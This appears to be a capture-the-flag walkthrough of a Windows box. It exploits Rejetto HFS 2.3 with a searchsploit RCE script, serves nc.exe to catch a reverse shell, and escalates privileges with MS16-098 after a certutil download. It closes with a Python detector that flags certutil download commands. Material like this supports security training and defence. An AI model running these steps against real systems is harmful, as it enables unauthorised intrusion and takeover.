

Port Scanning and General Enumeration (Nmap)

The initial scan showed that only port 80 (HTTP) is open.



Clicking the link takes us to www.rejetto.com.

What we know:

  • It’s running HttpFileServer 2.3
  • The vendor is rejetto

Access (searchsploit, Rejetto HFS RCE)

Let’s see if there’s anything on searchsploit for rejetto or HTTP File Server 2.3.

searchsploit rejetto


Let’s grab Remote Command Execution (2).

searchsploit -m 39161.py

-m allows us to copy the exploit into our current working directory.

Let’s read a bit about what it does:


#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!

So we need to be hosting nc.exe on port 80. That’s easy enough. On Kali, Windows binaries are stored at /usr/share/windows-binaries.


Now we’re going to need a few tabs:

  • On one, our python server (python3 -m http.server 80) where nc.exe is located
  • On another, a listener waiting to catch our shell (nc -lvnp 4444)
  • And finally, one to fire the exploit

This is what mine looked like after the exploit completed:



Privesc (Windows Exploit Suggester, MS16-098)

I ran winPEAS on the machine, but it didn’t come back with much, so I assume we may be looking at a kernel exploit. Let’s try Windows Exploit Suggester.

Note: for Windows Exploit Suggester to work, we need to install a specific version of xlrd:

pip2 install --user xlrd==1.1.0

There are a couple of things we need to do before we can run this.

  • First, run it with the --update switch. That will write an .xls file for us to use.
  • Second, on the victim machine, run the command systeminfo, copy all of the output and save it to a file. I’ll name mine systeminfo.txt.
  • Now run it:

python windows-exploit-suggester.py --database 2021-01-25-mssb.xls --systeminfo systeminfo.txt


Let’s look at MS16-098. There’s a precompiled binary for us to grab on the GitHub page. Let’s grab that and transfer it over to the victim machine.

certutil -urlcache -f Http:// ms16098.exe


Give it a run!
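From the defender’s side, the certutil transfer above leaves a clear trace in process-creation logs: certutil invoked with -urlcache and a URL argument instead of certificate work. The following is an added example, not part of this write-up, that flags such command lines over constructed Sysmon-style records; the host 192.0.2.10, the user name and the PIDs are made up.

```python
import re
import shlex

# Constructed process-creation records in the shape of a Sysmon Event ID 1 /
# Security 4688 export (hypothetical values, not taken from the write-up).
SAMPLE_EVENTS = [
    {"pid": 4120, "user": "OPTIMUM\\kostas",
     "cmd": 'certutil -urlcache -f http://192.0.2.10/ms16098.exe ms16098.exe'},
    {"pid": 4133, "user": "OPTIMUM\\kostas",
     "cmd": 'cmd.exe /c "C:\\Windows\\System32\\certutil.exe" -URLCache -split -f http://192.0.2.10/nc.exe nc.exe'},
    {"pid": 2210, "user": "NT AUTHORITY\\SYSTEM",
     "cmd": 'certutil -hashfile C:\\Windows\\System32\\drivers\\etc\\hosts SHA256'},
    {"pid": 2254, "user": "OPTIMUM\\kostas",
     "cmd": 'certutil -urlcache *'},  # only lists the URL cache, fetches nothing
]

URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
CERTUTIL_NAMES = ("certutil", "certutil.exe")

def _argv(cmdline):
    """Windows-style split: quotes group tokens, backslashes are not escapes."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes in the logged line
        return cmdline.split()

def is_certutil_download(cmdline):
    """True when certutil (even behind cmd.exe /c) is run with -urlcache
    and a URL argument, i.e. used as a download cradle."""
    argv = _argv(cmdline)
    start = -1
    for i, tok in enumerate(argv):
        base = tok.strip('"').lower().replace("/", "\\").rsplit("\\", 1)[-1]
        if base in CERTUTIL_NAMES:
            start = i
            break
    if start < 0:
        return False
    args = [a.strip('"') for a in argv[start + 1:]]
    flags = {a.lstrip("-/").lower() for a in args if a.startswith(("-", "/"))}
    return "urlcache" in flags and any(URL_RE.match(a) for a in args)

def scan_events(events):
    """Return (pid, user) for every record whose command line looks like a certutil download."""
    return [(e["pid"], e["user"]) for e in events if is_certutil_download(e["cmd"])]

if __name__ == "__main__":
    for pid, user in scan_events(SAMPLE_EVENTS):
        print(f"certutil download cradle: pid={pid} user={user}")
```

The -hashfile and bare -urlcache records are deliberately left unflagged so the rule does not fire on routine certificate or cache-listing use.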